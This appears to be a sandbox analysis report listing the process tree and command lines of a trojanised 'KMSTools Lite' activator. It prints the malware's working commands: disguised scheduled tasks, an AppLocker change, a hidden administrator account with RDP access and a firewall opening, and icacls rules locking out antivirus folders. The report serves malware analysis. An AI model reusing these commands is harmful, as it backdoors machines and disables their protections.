C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4816,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:83⤵PID:3784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=604,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4768 /prefetch:83⤵PID:4624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5792,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=5448 /prefetch:83⤵PID:2576
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4052,i,9075607320603130671,8923306479664572500,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:83⤵PID:2516
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe (PID 5540)
  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
C:\Windows\system32\cmd.exe (PID 4476)
  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5828)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
C:\Windows\System32\rundll32.exe (PID 5444)
  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe (PID 2560)
  "C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe (PID 2936)
  "C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
C:\Program Files\7-Zip\7zFM.exe (PID 2120)
  "C:\Program Files\7-Zip\7zFM.exe" "C:\PerfLogs\KMSTools.zip"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe (PID 344)
    "C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe"
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
C:\KMS Tools Lite Portable\KMSTools Lite.exe (PID 4264)
  "C:\KMS Tools Lite Portable\KMSTools Lite.exe"
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  C:\KMS Tools Lite Portable\GSetup.exe (PID 4712)
    "C:\KMS Tools Lite Portable\GSetup.exe"
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    C:\Windows\system32\cmd.exe (PID 2288)
      "C:\Windows\Sysnative\cmd.exe" /c copy C:\Windows\system32\Tasks\KMSTools "C:\Users\Admin\AppData\Local\Temp\KMSTools.tmp" /Y
    C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe (PID 5576)
      "C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "W10 Digital Activation Program"*
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
    C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe (PID 1300)
      "C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe"
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of SetWindowsHookEx
    C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe (PID 1544)
      "C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe" x data.pak -pratiboruskmstoolsmsfree.su -y -bsp1 -aos -o"C:\KMS Tools Lite Portable\Programs" "Office Installer+"*
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
    C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe (PID 2748)
      "C:\KMS Tools Lite Portable\Programs\Office Installer+\Office Installer+_x64.exe"
      - Executes dropped EXE
      - Suspicious use of SetWindowsHookEx
  C:\ProgramData\Setup\install.exe (PID 5232)
    C:\ProgramData\Setup\install.exe -palexpassword
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    C:\ProgramData\Setup\KMS.exe (PID 1748)
      "C:\ProgramData\Setup\KMS.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Blocks application from running via registry modification
      - Checks BIOS information in registry
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetWindowsHookEx
    C:\ProgramData\Setup\update.exe (PID 5544)
      "C:\ProgramData\Setup\update.exe"
      - Identifies VirtualBox via ACPI registry values (likely anti-VM)
      - Drops file in Drivers directory
      - Checks BIOS information in registry
      - Checks computer location settings
      - Executes dropped EXE
      - Checks whether UAC is enabled
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Drops file in Program Files directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      C:\Windows\System32\schtasks.exe (PID 2568)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\SystemManager" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\System32\schtasks.exe (PID 4100)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\ManagerService" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\System32\schtasks.exe (PID 2244)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\GlobalData" /TR "C:\Windows\SysWOW64\unsecapp.exe" /SC MINUTE /MO 1 /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\System32\schtasks.exe (PID 5380)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\WinlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\System32\schtasks.exe (PID 3784)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\WindowsBackup\OnlogonCheck" /TR "C:\Programdata\ReaItekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\ProgramData\Microsoft\win.exe (PID 476)
        C:\ProgramData\Microsoft\win.exe -ppidar
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
      C:\Windows\system32\cmd.exe (PID 3944)
        C:\Windows\system32\cmd.exe /c sc start appidsvc
        C:\Windows\system32\sc.exe (PID 3708)
          sc start appidsvc
          - Launches sc.exe
      C:\Windows\system32\cmd.exe (PID 5108)
        C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
        C:\Windows\system32\sc.exe (PID 6032)
          sc config appidsvc start= auto
          - Launches sc.exe
      C:\Windows\system32\cmd.exe (PID 5704)
        C:\Windows\system32\cmd.exe /c C:\ProgramData\WindowsTask\winlogon.bat
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4020)
          PowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\WindowsTask\new.xml"
          - Command and Scripting Interpreter: PowerShell
          - Drops file in System32 directory
          - Suspicious use of AdjustPrivilegeToken
      C:\Windows\System32\schtasks.exe (PID 4568)
        "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\SysFilesQ\RecoveryHosts" /TR "C:\ProgramData\Microsoft\DRM\Vb0NjPwXy\SysFilesQ.bat" /SC ONLOGON /RL HIGHEST
        - Scheduled Task/Job: Scheduled Task
      C:\Windows\system32\cmd.exe (PID 6000)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT_Data" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 4904)
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 2804)
          icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
      C:\ProgramData\Setup\svchost.exe (PID 5740)
        C:\ProgramData\Setup\svchost.exe -ppidar
        - Checks computer location settings
        - Executes dropped EXE
        - System Location Discovery: System Language Discovery
        - Suspicious use of SetWindowsHookEx
        C:\ProgramData\Setup\IP.exe (PID 5132)
          "C:\ProgramData\Setup\IP.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Executes dropped EXE
          - Adds Run key to start application
          - Checks whether UAC is enabled
          - Drops file in System32 directory
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - NTFS ADS
          - Suspicious use of SetWindowsHookEx
          C:\Windows\SysWOW64\unsecapp.exe (PID 4232)
            C:\Windows\SysWOW64\unsecapp.exe
            - Identifies VirtualBox via ACPI registry values (likely anti-VM)
            - Checks BIOS information in registry
            - Executes dropped EXE
            - Checks whether UAC is enabled
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious behavior: GetForegroundWindowSpam
          C:\Windows\system32\cmd.exe (PID 1896)
            C:\Windows\system32\cmd.exe /c C:\Programdata\Microsoft\temp\H.bat
            - Drops file in Drivers directory
        C:\ProgramData\Setup\smss.exe (PID 1968)
          "C:\ProgramData\Setup\smss.exe"
          - Identifies VirtualBox via ACPI registry values (likely anti-VM)
          - Checks BIOS information in registry
          - Checks computer location settings
          - Executes dropped EXE
          - Checks whether UAC is enabled
          - Suspicious use of NtSetInformationThreadHideFromDebugger
          - Drops file in Program Files directory
          - Checks processor information in registry
          - Modifies registry class
          - NTFS ADS
          - Suspicious use of SetWindowsHookEx
          C:\Windows\System32\schtasks.exe (PID 4796)
            "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST
            - Scheduled Task/Job: Scheduled Task
          C:\Windows\System32\schtasks.exe (PID 1356)
            "C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST
            - Scheduled Task/Job: Scheduled Task
          C:\ProgramData\Windows Tasks Service\winserv.exe (PID 6072)
            "C:\ProgramData\Windows Tasks Service\winserv.exe"
            - Checks computer location settings
            - Executes dropped EXE
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            C:\ProgramData\Windows Tasks Service\winserv.exe (PID 5128)
              "C:\ProgramData\Windows Tasks Service\winserv.exe" -second
              - Executes dropped EXE
              - System Location Discovery: System Language Discovery
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of SetWindowsHookEx
          C:\Windows\system32\cmd.exe (PID 4104)
            C:\Windows\system32\cmd.exe /c net user John 12345 /add
            C:\Windows\system32\net.exe (PID 1228)
              net user John 12345 /add
              C:\Windows\system32\net1.exe (PID 2232)
                C:\Windows\system32\net1 user John 12345 /add
          C:\Windows\system32\cmd.exe (PID 5768)
            C:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add
            C:\Windows\system32\net.exe (PID 4536)
              net localgroup "Администраторы" John /add
              C:\Windows\system32\net1.exe (PID 2196)
                C:\Windows\system32\net1 localgroup "Администраторы" John /add
          C:\Windows\system32\cmd.exe (PID 2228)
            C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add
            C:\Windows\system32\net.exe (PID 5696)
              net localgroup "Пользователи удаленного рабочего стола" John /add
              C:\Windows\system32\net1.exe (PID 6104)
                C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
          C:\Windows\system32\cmd.exe (PID 5992)
            C:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add
            C:\Windows\system32\net.exe (PID 1844)
              net localgroup "Пользователи удаленного управления" john /add" John /add
              C:\Windows\system32\net1.exe (PID 6020)
                C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add
          C:\Windows\system32\cmd.exe (PID 1124)
            C:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add
            C:\Windows\system32\net.exe (PID 2012)
              net localgroup "Administrators" John /add
              C:\Windows\system32\net1.exe (PID 4392)
                C:\Windows\system32\net1 localgroup "Administrators" John /add
          C:\Windows\system32\cmd.exe (PID 5284)
            C:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add
            C:\Windows\system32\net.exe (PID 476)
              net localgroup "Administradores" John /add
              C:\Windows\system32\net1.exe (PID 4948)
                C:\Windows\system32\net1 localgroup "Administradores" John /add
          C:\Windows\system32\cmd.exe (PID 2452)
            C:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add
            - Remote Service Session Hijacking: RDP Hijacking
            C:\Windows\system32\net.exe (PID 3932)
              net localgroup "Remote Desktop Users" john /add
              - Remote Service Session Hijacking: RDP Hijacking
              C:\Windows\system32\net1.exe (PID 4968)
                C:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add
                - Remote Service Session Hijacking: RDP Hijacking
          C:\ProgramData\RDPWinst.exe (PID 3240)
            C:\ProgramData\RDPWinst.exe -i
            - Server Software Component: Terminal Services DLL
            - Executes dropped EXE
            - Modifies WinLogon
            - Drops file in System32 directory
            - Drops file in Program Files directory
            - System Location Discovery: System Language Discovery
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of SetWindowsHookEx
            C:\Windows\SYSTEM32\netsh.exe (PID 3268)
              netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
              - Modifies Windows Firewall
              - Event Triggered Execution: Netsh Helper DLL
          C:\Windows\system32\cmd.exe (PID 5024)
            C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
            C:\Windows\system32\timeout.exe (PID 2124)
              timeout 5
              - Delays execution with timeout.exe
      C:\Windows\system32\cmd.exe (PID 2200)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 2352)
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny "Admin":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 2124)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 5000)
          icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 3272)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 3780)
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny "Admin":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 4780)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 900)
          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 6080)
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 4748)
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny "Admin":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 2308)
        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 5284)
          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 1264)
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 2456)
          icacls "C:\Windows\Fonts\Mysql" /deny "Admin":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 4728)
        C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 5212)
          icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 5580)
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 6096)
          icacls "c:\program files\Internet Explorer\bin" /deny "Admin":(OI)(CI)(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 5728)
        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 5444)
          icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 2752)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Windows\speechstracing" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 1056)
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 1356)
          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 3596)
        C:\Windows\system32\cmd.exe " /c " & "icacls "c:\programdata\Malwarebytes" /deny "%username%":(F)
      C:\Windows\system32\cmd.exe (PID 2808)
        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
        C:\Windows\system32\icacls.exe (PID 4556)
          icacls c:\programdata\Malwarebytes /deny System:(F)
      C:\Windows\system32\cmd.exe (PID 5936)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\MB3Install" /deny "%username%":(F)
      C:\Windows\system32\cmd.exe (PID 400)
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
        C:\Windows\system32\icacls.exe (PID 4456)
          icacls C:\Programdata\MB3Install /deny System:(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 6032)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\Programdata\Indus" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 1172)
        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 6056)
          icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 1384)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\AdwCleaner" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 2944)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny "%username%":(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 1700)
          icacls "C:\Program Files\ByteFence" /deny "Admin":(OI)(CI)(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 5732)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\KVRT2020_Data" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 1696)
        C:\Windows\system32\cmd.exe /c icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 4272)
          icacls C:\KVRT2020_Data /deny system:(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 2352)
        C:\Windows\system32\cmd.exe " /c " & "icacls "C:\FRST" /deny "%username%":(OI)(CI)(F)
      C:\Windows\system32\cmd.exe (PID 5024)
        C:\Windows\system32\cmd.exe /c icacls C:\FRST /deny system:(OI)(CI)(F)
        C:\Windows\system32\icacls.exe (PID 1344)
          icacls C:\FRST /deny system:(OI)(CI)(F)
          - Modifies file permissions
      C:\Windows\system32\cmd.exe (PID 5432)
        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny "%username%":(OI)(CI)(F)
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\360" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:1808
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny "%username%":(OI)(CI)(F)4⤵PID:6020
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\360safe" /deny "Admin":(OI)(CI)(F)5⤵PID:3284
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:5772
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵PID:5276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny "%username%":(OI)(CI)(F)4⤵PID:4784
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:4984
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny "%username%":(OI)(CI)(F)4⤵PID:5912
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\COMODO" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:5332
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny "%username%":(OI)(CI)(F)4⤵PID:4128
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny "Admin":(OI)(CI)(F)5⤵PID:2908
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny "%username%":(OI)(CI)(F)4⤵PID:1236
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\SpyHunter" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:480
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:3468
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵PID:2344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny "%username%":(OI)(CI)(F)4⤵PID:5952
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
PID:3184
-
-
-
[4] C:\Windows\system32\cmd.exe (PID 2516): C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1700): icacls "C:\Programdata\AVAST Software" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 4244): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5976): icacls "C:\Program Files\AVG" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 1472): C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 2096): icacls "C:\Program Files (x86)\AVG" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2196): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5536): icacls "C:\ProgramData\Norton" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2228): C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5024): icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 2124): C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5432): icacls "C:\Programdata\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2924): C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 5588): icacls "C:\Programdata\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 4340): C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 4404): icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 5668): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "%username%":(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 3932): icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny "Admin":(OI)(CI)(F)
      - Modifies file permissions
[4] C:\Windows\system32\cmd.exe (PID 2568): C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
  [5] C:\Windows\system32\icacls.exe (PID 1272): icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
[4] C:\Windows\system32\cmd.exe (PID 6084): C:\Windows\system32\cmd.exe /c icacls "c:\Program Files\HitmanPro" /deny "%username%":(OI)(CI)(F)
